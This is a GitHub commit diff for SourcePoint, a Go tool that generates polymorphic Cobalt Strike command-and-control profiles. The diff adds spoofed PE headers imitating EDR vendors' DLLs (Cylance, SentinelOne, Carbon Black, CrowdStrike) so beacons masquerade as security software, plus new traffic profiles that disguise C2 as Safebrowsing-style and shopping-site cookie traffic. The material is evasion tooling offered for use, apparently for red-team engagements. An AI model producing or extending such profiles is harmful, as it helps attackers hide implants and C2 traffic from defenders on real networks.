Skip to content

Commit

Permalink
v2.0
Browse files Browse the repository at this point in the history
  • Loading branch information
Matthew Eidelberg committed Oct 6, 2021
1 parent 7bebe64 commit 28ffed0
Show file tree
Hide file tree
Showing 5 changed files with 185 additions and 41 deletions.
20 changes: 13 additions & 7 deletions Loader/Loader.go
Original file line number Diff line number Diff line change
Expand Up @@ -85,12 +85,15 @@ func GenerateOptions(stage, sleeptime, jitter, useragent, uri, customuri, beacon
Process_Inject.Variables = GenerateProcessInject(processinject_min_alloc, injector)
Beacon_GETPOST_Profile.Variables, Beacon_SSL.Variables = GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, ProfilePath, Host)
fmt.Println("[*] Building Profile...")

Build(custom_cert, cert_password, outFile, Beacon_Com, Beacon_Stage_p1, Beacon_Stage_p2, Beacon_Stage_p3, Process_Inject, Beacon_PostEX, Beacon_GETPOST, Beacon_GETPOST_Profile, Beacon_SSL)
fmt.Println(HostStageMessage)
PE := strings.Split(Beacon_Stage_p2.Variables["pe"], `;`)
PE_Name := strings.Split(PE[5], `"`)
fmt.Println("[*] Beacon DLL spoffed To: " + PE_Name[1])
PEX := strings.Split(Beacon_PostEX.Variables["Post_EX_Process_Name"], `sysnative\\`)
PEX_Name := PEX[1]
fmt.Println("[*] Post-Ex Process Name: " + PEX_Name[:(len(PEX_Name)-3)])
fmt.Println("[*] Post-Ex process name: " + PEX_Name[:(len(PEX_Name)-3)])
fmt.Println("[!] Beacon shellcode will obfuscate beacon in memory prior to sleeping")
Name, _ := strconv.Atoi(Profile)
fmt.Println("[*] Seleted Profile: " + Struct.Profile_Names[Name])
fmt.Println("[+] Profile Generated: " + outFile)
Expand Down Expand Up @@ -248,6 +251,9 @@ func GenerateHTTPVaribles(Host, metadata, uri, customuri, CDN, CDN_Value, Profil
Beacon_GETPOST.Variables["maxage"] = Utils.GenerateNumer(172800, 31536001)
Beacon_GETPOST.Variables["Age"] = Utils.GenerateNumer(1222, 2500)

Beacon_GETPOST.Variables["UValue"] = Utils.GenerateValue(6, 15)
Beacon_GETPOST.Variables["CSMValue"] = Utils.GenerateValue(6, 15)

if Forwarder == true {
Beacon_GETPOST.Variables["forward"] = "true"
} else {
Expand All @@ -261,13 +267,13 @@ func GeneratePE(beacon_PE string) map[string]string {
Beacon_Stage_p2 := &Beacon_Stage_p2{}
Beacon_Stage_p2.Variables = make(map[string]string)
if beacon_PE == "" {
PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 25))
PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 30))
Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[PE_Num]
}
if beacon_PE != "" {
PE_Num, _ := strconv.Atoi(beacon_PE)
if PE_Num >= 27 {
log.Fatal("Error: Please provide a valid PE number less the 26 option")
if PE_Num >= 30 {
log.Fatal("Error: Please provide a valid PE number less the 31 option")
}
Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[(PE_Num - 1)]
}
Expand Down Expand Up @@ -330,7 +336,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]

} else if num_Profile == 5 {
} else if num_Profile == 5 || num_Profile == 7 {
if cert_password == "" {
log.Fatal("Error: Please provide a Password value to use this profile")
}
Expand All @@ -339,7 +345,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
}
Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]
} else if num_Profile == 7 {
} else if num_Profile == 8 {
if cert_password == "" {
log.Fatal("Error: Please provide a Password value to use this profile")
}
Expand Down
30 changes: 21 additions & 9 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,10 @@ SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written
<p align="center"> <img src=Screenshots/C2int_p1.png width="900" height="710" border="2px solid #555">
<p align="center"> <img src=Screenshots/C2int_p2.png width="900" height="480" border="2px solid #555">

```
go install github.com/Tylous/SourcePoint
```


## Installation
```
Expand Down Expand Up @@ -40,12 +44,14 @@ Usage of ./SourcePoint:
The base URI for custom HTTP GET/POST profile (default "0")
-Datajitter string
Appends a value to HTTP-Get and HTTP-Post server output (default "50")
-Forwarder
Enabled the X-forwarded-For header (Good for when your C2 is behind a redirector)
-Host string
Team server domain name
-Injector string
Select the preferred method to allocate memory in the remote process:
Select the preferred method to allocate memory in The remote process:
[*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
[*] NtMapViewOfSection (A more stealthly option, however fails over to VirtualAllocEx, generating more events when it does)
[*] NtMapViewOfSection (A more steathly option however fails over to VirtualAllocEx generating more events when it does)
-Jitter string
Jitter percentage for beacon call home
-Keylogger string
Expand Down Expand Up @@ -90,10 +96,14 @@ Usage of ./SourcePoint:
[24] wow64.dll
[25] wow64win.dll
[26] WWANSVC.dll
[27] CyMemDef64.dll (Cylance's DLL)
[28] InProcessClient.dll (SentinelOne's DLL)
[29] ctiuser.dll (Carbon Black's DLL)
[30] umppc.dll (CrowdStrike's DLL)
-Password string
SSL certificate password
-PostEX_Name string
File Post-Ex activities will spawn and inject into (Use the number):
File Post-Ex activties will spawn and inject into (Use the number):
[1] WerFault.exe
[2] WWAHost.exe
[3] wlanext.exe
Expand All @@ -118,15 +128,16 @@ Usage of ./SourcePoint:
[2] Slack
[3] Gotomeeting
[4] Outlook.Live
[5] Cloudfront
[6] AzureEdge
[7] Custom (Used with ProfilePath)
[5] Safebrowsing [Cloudfront Compatible]
[6] AzureEdge [AzureEdge Compatible]
[7] Field-Keyword [Cloudfront Compatible]
[8] Custom (Used with ProfilePath)
-ProfilePath string
Path of custom HTTP GET/POST profile...
-Sleep string
Initial beacon sleep time
Inital beacon sleep time
-Stage string
Disable host staging (Default: False) (default "False")
Disable host staging (Default: False) (default "false")
-Uri string
The number URIs a profile for beacons to choose from
-Useragent string
Expand Down Expand Up @@ -205,7 +216,7 @@ Currently SourcePoint provides you with 6 baked in options for HTTP/HTTPS traffi
* Gotomeeting's Active Meeting Communication
* Microsoft Outlook's Email Communication

2 of the profile options (5 and 6) are designed specifically for:
2 of the profile options (5, 6 and 7) are designed specifically for:
* Cloudfront.net
* AzureEdge.net

Expand Down Expand Up @@ -243,6 +254,7 @@ Customuri:
CDN:
CDN_Value:
ProfilePath:
Forwarder: False
```


Expand Down
13 changes: 9 additions & 4 deletions SourcePoint.go
Original file line number Diff line number Diff line change
Expand Up @@ -118,7 +118,11 @@ func options() *FlagOptions {
[23] winsqlite3.dll
[24] wow64.dll
[25] wow64win.dll
[26] WWANSVC.dll`)
[26] WWANSVC.dll
[27] CyMemDef64.dll (Cylance's DLL)
[28] InProcessClient.dll (SentinelOne's DLL)
[29] ctiuser.dll (Carbon Black's DLL)
[30] umppc.dll (CrowdStrike's DLL)`)
processinject_min_alloc := flag.String("Allocation", "", "Minimum amount of memory to request for injected content (must be higher than 4096)")
Post_EX_Process_Name := flag.String("PostEX_Name", "", `File Post-Ex activties will spawn and inject into (Use the number):
[1] WerFault.exe
Expand All @@ -144,9 +148,10 @@ func options() *FlagOptions {
[2] Slack
[3] Gotomeeting
[4] Outlook.Live
[5] Cloudfront
[6] AzureEdge
[7] Custom (Used with ProfilePath)`)
[5] Safebrowsing [Cloudfront Compatible]
[6] AzureEdge [AzureEdge Compatible]
[7] Field-Keyword [Cloudfront Compatible]
[8] Custom (Used with ProfilePath)`)
ProfilePath := flag.String("ProfilePath", "", "Path of custom HTTP GET/POST profile...")
metadata := flag.String("Metadata", "base64url", `Specifies how to transform and embed metadata into the HTTP request:
[*] base64
Expand Down
131 changes: 114 additions & 17 deletions Struct/Struct.go
Original file line number Diff line number Diff line change
Expand Up @@ -6,10 +6,10 @@ var Profile_Names = []string{
`Slack`,
`Gotomeeting`,
`Outlook.Live`,
`Cloudfront`,
`Safebrowsing`,
`AzureEdge`,
`Custom
`}
`Field-Keyword`,
`Custom`}

var Post_EX_Process_Name = []string{`
set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
Expand Down Expand Up @@ -317,7 +317,40 @@ var Peclone_list = []string{`
set image_size_x64 "1785856";
set name "WWANSVC.DLL";
set rich_header "\x77\xf3\x15\x7d\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x3a\xea\xe8\x2e\xb3\x92\x7b\x2e\x68\xfa\x7f\x2f\x3c\x92\x7b\x2e\x68\xfa\x78\x2f\x30\x92\x7b\x2e\x68\xfa\x7e\x2f\x2d\x92\x7b\x2e\x33\x92\x7a\x2e\xf8\x97\x7b\x2e\x68\xfa\x7a\x2f\x3e\x92\x7b\x2e\x68\xfa\x7b\x2f\x32\x92\x7b\x2e\x68\xfa\x72\x2f\xa9\x92\x7b\x2e\x68\xfa\x86\x2e\x32\x92\x7b\x2e\x68\xfa\x84\x2e\x32\x92\x7b\x2e\x68\xfa\x79\x2f\x32\x92\x7b\x2e\x52\x69\x63\x68\x33\x92\x7b\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`}
`,
`
set checksum "164653";
set compile_time "06 Nov 2020 18:42:28";
set entry_point "63072";
set name "CyMemDef64.dll";
set rich_header "\x5f\x64\xdb\xae\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb4\xfd\x30\x05\xb5\xfd\xe7\x72\x0c\xfd\x18\x05\xb5\xfd\x7d\xeb\x66\xfd\x07\x05\xb5\xfd\x3c\xc3\x78\xfd\x1a\x05\xb5\xfd\x7d\xeb\x7f\xfd\x1a\x05\xb5\xfd\x3c\xc3\x7c\xfd\x1a\x05\xb5\xfd\x1b\x05\x22\xfd\x1a\x05\xb5\xfd\x7d\xeb\x79\xfd\x1a\x05\xb5\xfd\x52\x69\x63\x68\x1b\x05\xb5\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "1968945";
set compile_time "26 Jul 2021 18:09:30";
set entry_point "1099888";
set image_size_x86 "2072576";
set image_size_x64 "2072576";
set name "InProcessClient.dll";
set rich_header "\xd5\x71\x0e\xb3\x91\x10\x60\xe0\x91\x10\x60\xe0\x91\x10\x60\xe0\x85\x7b\x63\xe1\x84\x10\x60\xe0\x85\x7b\x65\xe1\x24\x10\x60\xe0\x48\x64\x64\xe1\x83\x10\x60\xe0\x48\x64\x63\xe1\x9d\x10\x60\xe0\xf7\x7f\x9d\xe0\x92\x10\x60\xe0\x4a\x64\x61\xe1\x93\x10\x60\xe0\x85\x7b\x64\xe1\xb2\x10\x60\xe0\x85\x7b\x61\xe1\x94\x10\x60\xe0\x48\x64\x65\xe1\x0e\x10\x60\xe0\xfb\x78\x65\xe1\x80\x10\x60\xe0\x85\x7b\x66\xe1\x93\x10\x60\xe0\x91\x10\x61\xe0\x5c\x11\x60\xe0\x4a\x64\x69\xe1\x03\x10\x60\xe0\x4a\x64\x63\xe1\x93\x10\x60\xe0\x4a\x64\x60\xe1\x90\x10\x60\xe0\x4a\x64\x9f\xe0\x90\x10\x60\xe0\x91\x10\xf7\xe0\x90\x10\x60\xe0\x4a\x64\x62\xe1\x90\x10\x60\xe0\x52\x69\x63\x68\x91\x10\x60\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "2817694";
set compile_time "19 May 2021 13:31:53";
set entry_point "1253200";
set image_size_x86 "2863104";
set image_size_x64 "2863104";
set name "ctiuser.dll";
set rich_header "\x15\xd9\xb0\x30\x51\xb8\xde\x63\x51\xb8\xde\x63\x51\xb8\xde\x63\x45\xd3\xda\x62\x47\xb8\xde\x63\x45\xd3\xdd\x62\x5f\xb8\xde\x63\x45\xd3\xdb\x62\x90\xb8\xde\x63\xcf\x18\x19\x63\x52\xb8\xde\x63\xa9\xc8\xda\x62\x40\xb8\xde\x63\xa9\xc8\xdd\x62\x5b\xb8\xde\x63\xa9\xc8\xdb\x62\xdf\xb8\xde\x63\x45\xd3\xdf\x62\x54\xb8\xde\x63\x45\xd3\xd8\x62\x53\xb8\xde\x63\x51\xb8\xdf\x63\x29\xb9\xde\x63\xe9\xc9\xda\x62\x69\xb8\xde\x63\xe9\xc9\xdb\x62\x13\xb8\xde\x63\xe9\xc9\xde\x62\x50\xb8\xde\x63\xe9\xc9\x21\x63\x50\xb8\xde\x63\x51\xb8\x49\x63\x50\xb8\xde\x63\xe9\xc9\xdc\x62\x50\xb8\xde\x63\x52\x69\x63\x68\x51\xb8\xde\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
`
set checksum "83724";
set compile_time "05 Aug 2020 16:06:20";
set entry_point "5664";
set name "umppc.dll";
set rich_header "\xba\xf0\x63\x99\xfe\x91\x0d\xca\xfe\x91\x0d\xca\xfe\x91\x0d\xca\x92\xf9\x0e\xcb\xff\x91\x0d\xca\x92\xf9\x05\xcb\xf3\x91\x0d\xca\x9b\xf7\x0e\xcb\xfc\x91\x0d\xca\x9b\xf7\x09\xcb\xfb\x91\x0d\xca\x9b\xf7\x0c\xcb\xfd\x91\x0d\xca\xfe\x91\x0c\xca\xc6\x91\x0d\xca\x92\xf9\x0d\xcb\xff\x91\x0d\xca\x92\xf9\xf2\xca\xff\x91\x0d\xca\x92\xf9\x0f\xcb\xff\x91\x0d\xca\x52\x69\x63\x68\xfe\x91\x0d\xca\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
`,
}

var Useragent_list = []string{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4242.0 Safari/537.36",
Expand Down Expand Up @@ -780,8 +813,8 @@ server {
http-stager {
set uri_x86 "/Meeting/32251817/";
set uri_x64 "/Meeting/32251816/";
set uri_x86 "/Meeting/{{.Variables.UValue}}/";
set uri_x64 "/Meeting/{{.Variables.UValue}}/";
client {
header "Host" "{{.Variables.Host}}";
Expand All @@ -797,20 +830,20 @@ server {
}
`, `
http-get {
{{.Variables.HTTP_GET_URI}}
http-config {
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "{{.Variables.forward}}";
}
http-get {
{{.Variables.HTTP_GET_URI}}
client {
header "Host" "{{.Variables.Host}}";
header "Accept" "*/*";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42={{.Variables.UValue}}";
metadata {
{{.Variables.metadata_mode}};
Expand Down Expand Up @@ -944,7 +977,7 @@ client {
header "Accept-Language" "en-US,en;q=0.5";
metadata {
{{.Variables.metadata_mode}};
prepend "REF=ID=";
prepend "REF=ID={{.Variables.UValue}}";
header "Cookie";
}
}
Expand Down Expand Up @@ -976,7 +1009,7 @@ client {
id {
{{.Variables.metadata_mode}};
prepend "U=193u81141";
prepend "U={{.Variables.UValue}}";
prepend "REF=ID=";
header "Cookie";
}
Expand Down Expand Up @@ -1066,7 +1099,6 @@ server {
}
}
`, `
http-config {
#set "true" if teamserver is behind redirector
Expand All @@ -1084,7 +1116,7 @@ client {
metadata {
{{.Variables.metadata_mode}};
prepend "PREF=ID=";
prepend "PREF=ID={{.Variables.CSMValue}}";
header "Cookie";
}
}
Expand Down Expand Up @@ -1115,7 +1147,7 @@ client {
id {
{{.Variables.metadata_mode}};
prepend "U=779b64e1a7ed737a";
prepend "U={{.Variables.UValue}}";
prepend "PREF=ID=";
header "Cookie";
}
Expand All @@ -1137,7 +1169,72 @@ server {
print;
}
}
}`}
}`,
`
http-config {
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "{{.Variables.forward}}";
}
http-get {
{{.Variables.HTTP_GET_URI}}
client {
header "Accept" "*/*";
metadata {
{{.Variables.metadata_mode}};;
prepend "session-token=";
append "csm-hit={{.Variables.CSMValue}}";
header "Cookie";
}
}
server {
output {
print;
}
}
}
http-post {
{{.Variables.HTTP_POST_URI}}
client {
header "Accept" "*/*";
header "Content-Type" "text/xml";
header "X-Requested-With" "XMLHttpRequest";
id {
{{.Variables.metadata_mode}};;
prepend "U={{.Variables.UValue}}";
prepend "REF=ID=";
header "Cookie";
}
output {
print;
}
}
server {
header "Server" "Server";
header "X-Frame-Options" "SAMEORIGIN";
header "x-ua-compatible" "IE=edge";
output {
print;
}
}
}
`,
}

var Cert = []string{`
set O "Microsoft Corporation"; #Organization Name
Expand Down
Loading

0 comments on commit 28ffed0

Please sign in to comment.